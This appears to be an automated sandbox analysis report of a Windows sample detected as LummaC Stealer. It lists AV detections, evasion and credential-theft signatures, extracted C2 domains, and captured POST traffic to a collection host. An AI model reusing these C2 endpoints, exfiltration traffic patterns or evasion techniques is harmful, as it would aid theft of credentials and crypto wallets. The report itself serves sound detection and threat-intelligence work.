Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1637453
MD5: 6f5fd4f79167a7e2c0db0a9f925118b4
SHA1: 5a9887316db9016897fbb8e7e349ec5e27fb6ba8
SHA256: ceb426731770a6cc7dcf8eb3a1c0f861e3e5e94562f7c0c37003219485e47509
Tags: exe, user-jstrosch
Infos:

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected non-DNS traffic on DNS port
Entry point lies outside standard sections
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6392 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6F5FD4F79167A7E2C0DB0A9F925118B4)
  • cleanup
{"C2 url": ["begindecafer.world/QwdZdf", "garagedrootz.top/oPsoJAN", "modelshiverd.icu/bJhnsj", "arisechairedd.shop/JnsHY", "catterjur.run/boSnzhu", "orangemyther.live/IozZ", "fostinjec.today/LksNAz"], "Build id": "ed282de2492e515b5a600f7d9993d88a1a4bd6ca37dc2297a2a91518"}
Source | Rule | Description | Author | Strings
00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000000.00000003.1136637956.0000000000A98000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: file.exe PID: 6392 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: file.exe PID: 6392 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.220000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-13T16:40:03.885406+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49700 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:03.885406+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49697 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:03.885406+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49703 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:03.885406+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49706 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:12.999379+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49682 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:15.930609+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49683 | 188.114.97.3 | 443 | TCP
2025-03-13T16:40:19.449635+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49684 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:22.189166+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49685 | 188.114.97.3 | 443 | TCP
2025-03-13T16:40:25.133637+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49686 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:28.100390+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49688 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:31.495330+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49693 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:34.325343+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49694 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:37.749650+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49695 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:40.555151+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49696 | 104.73.234.102 | 443 | TCP

            AV Detection

            Source: file.exe | Avira: detected
            Source: orangemyther.live/IozZ | Avira URL Cloud: Label: malware
            Source: begindecafer.world/QwdZdf | Avira URL Cloud: Label: malware
            Source: garagedrootz.top/oPsoJAN | Avira URL Cloud: Label: malware
            Source: https://fostinjec.today:443/LksNAzf | Avira URL Cloud: Label: malware
            Source: https://begindecafer.world:443/QwdZdf | Avira URL Cloud: Label: malware
            Source: catterjur.run/boSnzhu | Avira URL Cloud: Label: malware
            Source: modelshiverd.icu/bJhnsj | Avira URL Cloud: Label: malware
            Source: arisechairedd.shop/JnsHY | Avira URL Cloud: Label: malware
            Source: https://arisechairedd.shop:443/JnsHY | Avira URL Cloud: Label: malware
            Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["begindecafer.world/QwdZdf", "garagedrootz.top/oPsoJAN", "modelshiverd.icu/bJhnsj", "arisechairedd.shop/JnsHY", "catterjur.run/boSnzhu", "orangemyther.live/IozZ", "fostinjec.today/LksNAz"], "Build id": "ed282de2492e515b5a600f7d9993d88a1a4bd6ca37dc2297a2a91518"}
            Source: file.exe | Virustotal: Detection: 64%
            Source: file.exe | ReversingLabs: Detection: 60%
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmp | String decryptor: begindecafer.world/QwdZdf
            Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmp | String decryptor: garagedrootz.top/oPsoJAN
            Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmp | String decryptor: modelshiverd.icu/bJhnsj
            Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmp | String decryptor: arisechairedd.shop/JnsHY
            Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmp | String decryptor: catterjur.run/boSnzhu
            Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmp | String decryptor: orangemyther.live/IozZ
            Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmp | String decryptor: fostinjec.today/LksNAz
            Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknown | HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49682 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49683 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49684 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49685 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49686 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49688 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49693 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49694 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49695 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49696 version: TLS 1.2

            Networking

            Source: Malware configuration extractor | URLs: begindecafer.world/QwdZdf
            Source: Malware configuration extractor | URLs: garagedrootz.top/oPsoJAN
            Source: Malware configuration extractor | URLs: modelshiverd.icu/bJhnsj
            Source: Malware configuration extractor | URLs: arisechairedd.shop/JnsHY
            Source: Malware configuration extractor | URLs: catterjur.run/boSnzhu
            Source: Malware configuration extractor | URLs: orangemyther.live/IozZ
            Source: Malware configuration extractor | URLs: fostinjec.today/LksNAz
            Source: global traffic | TCP traffic: 192.168.2.8:51354 -> 162.159.36.2:53
            Source: global traffic | HTTP traffic detected:
                GET /profiles/76561199822375128 HTTP/1.1
                Connection: Keep-Alive
                Host: steamcommunity.com
            Source: Joe Sandbox View | IP Address: 188.114.97.3
            Source: Joe Sandbox View | IP Address: 104.73.234.102
            Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49685 -> 188.114.97.3:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49686 -> 104.73.234.102:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49683 -> 188.114.97.3:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49684 -> 104.73.234.102:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49696 -> 104.73.234.102:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49693 -> 104.73.234.102:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49694 -> 104.73.234.102:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49688 -> 104.73.234.102:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49695 -> 104.73.234.102:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49682 -> 104.73.234.102:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49700 -> 104.73.234.102:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49697 -> 104.73.234.102:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49703 -> 104.73.234.102:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.73.234.102:443
            Source: global traffic | HTTP traffic detected:
                POST /bSHsyZD HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 65
                Host: guntac.bet
            Source: global traffic | HTTP traffic detected:
                POST /bSHsyZD HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=gDVu0p986
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 14490
                Host: guntac.bet
            Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | DNS traffic detected: DNS query: begindecafer.world
            Source: global traffic | DNS traffic detected: DNS query: garagedrootz.top
            Source: global traffic | DNS traffic detected: DNS query: modelshiverd.icu
            Source: global traffic | DNS traffic detected: DNS query: arisechairedd.shop
            Source: global traffic | DNS traffic detected: DNS query: catterjur.run
            Source: global traffic | DNS traffic detected: DNS query: orangemyther.live
            Source: global traffic | DNS traffic detected: DNS query: fostinjec.today
            Source: global traffic | DNS traffic detected: DNS query: sterpickced.digital
            Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
            Source: global traffic | DNS traffic detected: DNS query: guntac.bet
            Source: unknown | HTTP traffic detected:
                POST /bSHsyZD HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 65
                Host: guntac.bet
            Source: file.exe, 00000000.00000003.919517641.0000000000A74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://arisechairedd.shop:443/JnsHY
            Source: file.exe, 00000000.00000003.919517641.0000000000A74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://begindecafer.world:443/QwdZdf
00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=jfdb
            Source: file.exe, 00000000.00000003.1137069557.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103118777.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193193906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187388354.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1194643055.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187351626.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 
00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=D1VziU1eIKI3&l=englis
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_co?
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=whw8EcafG167&amp
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/sh8
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193503319.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196473496.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187422565.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
